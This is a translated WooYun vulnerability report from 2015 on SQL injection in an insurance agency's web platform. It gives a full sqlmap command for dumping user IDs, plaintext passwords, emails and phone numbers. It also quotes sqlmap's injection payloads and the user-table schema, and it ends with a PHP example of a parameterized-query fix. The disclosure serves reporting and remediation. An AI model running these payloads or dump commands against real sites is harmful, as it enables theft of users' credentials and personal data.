
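Vulnerability summary

Bug ID: wooyun-2015-0152450

Title: SQL injection in an online insurance trading platform of Beijing Likang Insurance Agency Co., Ltd. (北京立康保险代理有限公司) (260 tables; real names, plaintext passwords, e-mail addresses and phone numbers of a large number of users exposed)

Vendor: Beijing Likang Insurance Agency Co., Ltd. (北京立康保险代理有限公司)

Reporter: 路人甲

Submitted: 2015-11-07 09:45

Fixed: 2015-12-26 10:32

Disclosed: 2015-12-26 10:32

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 10

Status: Handed over to a third-party partner organization (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org. For questions or help, contact [email protected]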



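Vulnerability details

Disclosure status:

2015-11-07: Details reported to the vendor; awaiting vendor handling
2015-11-11: Vendor confirmed; details disclosed to the vendor only
2015-11-21: Details disclosed to core white hats and experts in related fields
2015-12-01: Details disclosed to regular white hats
2015-12-11: Details disclosed to intern white hats
2015-12-26: Details disclosed to the public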

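Brief description:

Insurance protection is indispensable in everyone's life. Insurance carries the dual meaning of protection and risk avoidance, and with its diversified development in recent years it has also taken on an investment and wealth-management role. 立刻保 (Likebao), part of Beijing Likang Insurance Agency Co., Ltd., is a leading online insurance trading platform in China, dedicated to integrating insurance products with online functionality and offering users more convenient service. 立刻保 has service centers across the country, maintains close and good cooperation with local insurers, and acts as agent for the insurance products of more than ten insurance companies. We hope to use the nature of the Internet to make insurance product information transparent, so that customers can compare and choose products, pay, and complete the purchase without leaving home, easily, freely and without being disturbed.

Detailed description:

URL: http://**.**.**.**/companycategory/?Command=Index&company_category_no=141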

python sqlmap.py -u "http://**.**.**.**/companycategory/?Command=Index&company_category_no=141" --random-agent -p company_category_no --technique=BETU --batch -D LIKE18 -T user -C user_id,user_name,user_pw,user_email,user_phone,user_mobile --dump --threads=10

Proof of vulnerability:

<code>---
Parameter: company_category_no (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: Command=Index&company_category_no=141' AND 3198=3198 AND 'uktf'='uktf
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: Command=Index&company_category_no=141' AND (SELECT 5848 FROM(SELECT COUNT(*),CONCAT(0x7178707071,(SELECT (ELT(5848=5848,1))),0x716b7a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ESQF'='ESQF
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: Command=Index&company_category_no=141' AND (SELECT * FROM (SELECT(SLEEP(5)))uheh) AND 'bwUj'='bwUj
Type: UNION query
Title: Generic UNION query (NULL) - 13 columns
Payload: Command=Index&company_category_no=-2515' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7178707071,0x516e716b74644c5a746f495766416a6b767442414e784e68524675736a4e4268534e475a785a7375,0x716b7a7671)-- -
---
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL 5.0
current user: 'like18@%'
current user is DBA: False
database management system users [1]:
[*] 'like18'@'%'
available databases [4]:
[*] information_schema
[*] LIKE18
[*] LIKE18S
[*] test
Database: LIKE18
[260 tables]
Database: LIKE18
Table: user
[32 columns]
+---------------------+------------------+
| Column | Type |
+---------------------+------------------+
| allow_ip | varchar(100) |
| areaid | mediumint(8) |
| create_time | datetime |
| create_user_no | int(11) unsigned |
| del_flag | tinyint(4) |
| note | text |
| old_user_pw1 | varchar(20) |
| old_user_pw2 | varchar(20) |
| old_user_pw3 | varchar(20) |
| pw_error_count | tinyint(3) |
| pw_last_update | datetime |
| update_time | datetime |
| update_user_no | int(11) unsigned |
| user_allocateweight | int(11) |
| user_bindable | tinyint(3) |
| user_bindto | int(10) |
| user_business_type | tinyint(3) |
| user_dep | varchar(100) |
| user_email | varchar(100) |
| user_feedbackweight | tinyint(3) |
| user_id | varchar(20) |
| user_last_login | datetime |
| user_mobile | varchar(20) |
| user_name | varchar(100) |
| user_no | int(10) |
| user_orderweight | int(11) |
| user_phone | varchar(20) |
| user_pw | varchar(20) |
| user_status | tinyint(3) |
| user_title | varchar(100) |
| user_type | tinyint(3) |
| user_workgroupid | int(11) |
+---------------------+------------------+
Database: LIKE18
+--------+---------+
| Table | Entries |
+--------+---------+
| `user` | 703 |
+--------+---------+
Database: LIKE18
Table: user
[703 entries]
</code>

Suggested fix:

Add filtering.

Copyright notice: when reposting, please credit the source, 路人甲@乌云
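One way to implement the fix for a numeric parameter such as `company_category_no`, shown beside the string-concatenated form that the quote-breaking payloads in the sqlmap output imply. This is an added example, not code from the report or from the affected site; the table layout, rows and function names are assumptions, and an in-memory SQLite database stands in for the MySQL back end so the script runs offline.

```php
<?php
// Added example. Schema, rows and function names are constructed for
// illustration; in-memory SQLite stands in for MySQL so this runs offline.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE company_category (company_category_no INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO company_category VALUES (141, 'constructed category A')");
$pdo->exec("INSERT INTO company_category VALUES (142, 'constructed category B')");

// BEFORE: the raw GET value is pasted between quotes, so a quote inside
// the value ends the string literal and the remainder is parsed as SQL.
function find_category_vulnerable(PDO $pdo, $raw)
{
    $sql = "SELECT name FROM company_category WHERE company_category_no = '" . $raw . "'";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_COLUMN);
}

// AFTER: allow-list the value, then pass it as a bound parameter so it
// can never be parsed as SQL text.
function find_category_hardened(PDO $pdo, $raw)
{
    // Accept only 1-9 decimal digits. \A and \z anchor the whole string;
    // a plain $ would also accept a trailing newline.
    if (!is_string($raw) || !preg_match('/\A[0-9]{1,9}\z/', $raw)) {
        return null; // caller should answer HTTP 400 and log the request
    }
    // With the MySQL driver, also set PDO::ATTR_EMULATE_PREPARES to false
    // so the statement is prepared and bound on the server.
    $stmt = $pdo->prepare('SELECT name FROM company_category WHERE company_category_no = :no');
    $stmt->bindValue(':no', (int) $raw, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

$inputs = array(
    '141',                                  // legitimate request
    "141' AND 3198=3198 AND 'uktf'='uktf",  // boolean-based payload quoted in the report
    "141' AND 3198=3199 AND 'uktf'='uktf",  // constructed variant with a false condition
);

foreach ($inputs as $raw) {
    $before = find_category_vulnerable($pdo, $raw);
    $after  = find_category_hardened($pdo, $raw);
    printf(
        "%-40s before=%s after=%s\n",
        $raw,
        json_encode($before),
        $after === null ? 'rejected' : json_encode($after)
    );
}
```

In the concatenated version the two payloads return different result sets, which is the true/false signal a boolean-based blind test relies on; the hardened version rejects both before any query is built.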


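Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2015-11-11 10:30

Vendor reply:

CNVD confirmed and reproduced the reported issue; it has been forwarded via CNCERT to the authority in charge of informatization for the insurance industry, which will coordinate follow-up handling by the site's operator.

Latest status:

None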